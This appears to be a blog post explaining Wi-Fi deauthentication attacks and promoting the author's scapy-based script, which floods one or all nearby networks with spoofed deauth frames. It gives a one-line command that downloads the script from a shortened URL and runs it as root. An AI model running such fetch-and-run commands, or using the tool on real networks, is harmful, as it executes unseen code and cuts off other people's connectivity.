A Wi-Fi deauthentication attack is a type of denial-of-service attack that targets communication between a user and a Wi-Fi wireless access point.
As you can see, this type of attack is pretty powerful and difficult to detect who is attacking. There are some tools for this attack like “aircrack-ng”(You can check the commands here).
So, basically the concept is the attacker broadcasts a wifi management “De-authentication” frame to victim’s to tell deauthenticate. It is like, “Hey client! can you please deauthenticate and authenticate”. Then the client will reconnect to AP(Access Point). These type of frames are supposed to send by valid “AP” to its clients, but the attacker can mimic these frames and broadcasts in the network.
Interestingly, the victim’s laptop/device could not differentiate between attacker and valid AP. Here, the attacker creates “De-authentication” packet/frame with source MAC address of valid AP’s MAC address. So, every device thinks, the management frame came from valid AP.
The attacker not just send the frame once, but sends continuously. Things get pretty bad, now the clients continuously trying to reconnect. In this way, the clients never connect to its valid AP until the attacker stops sending the “deauth” frames.
I automated these steps with Python. I used “scapy” module to send “deauth” frames.
You can check my github repo
Want to try this script? run bellow commands. (Know, what you are doing!)
- aircrack-ng (
sudo apt-get install aircrack-ng)
- scapy (Python Module:
sudo apt-get install python-scapy)
Download and run the script
sudo wget -O deauth.py https://goo.gl/5gGHbE && sudo python deauth.py
When you run the command, you should see like bellow.
When you start the script, it will create “mon0” interface(A monitoring virtual interface used to send our deauth frames) and observes the wifi signals. After few seconds, it will display near APs and its MAC addresses. Choose one to broadcasts the “deauth” frames to that network which results network outage for connected clients to that AP.
If you press “0”, the script will send deauth frames to every network(I used multi-threading here :-P)
So, how to avoid this attack?
NOTE: Inorder to work deauthentication attack successful, you should near to the target network. The
deauth packets should reach the connected devices of the target network(s)
Just check my repo, you can run the script in some other ways also. Dependency problem in your machine? use my docker image to kick the environment quickly.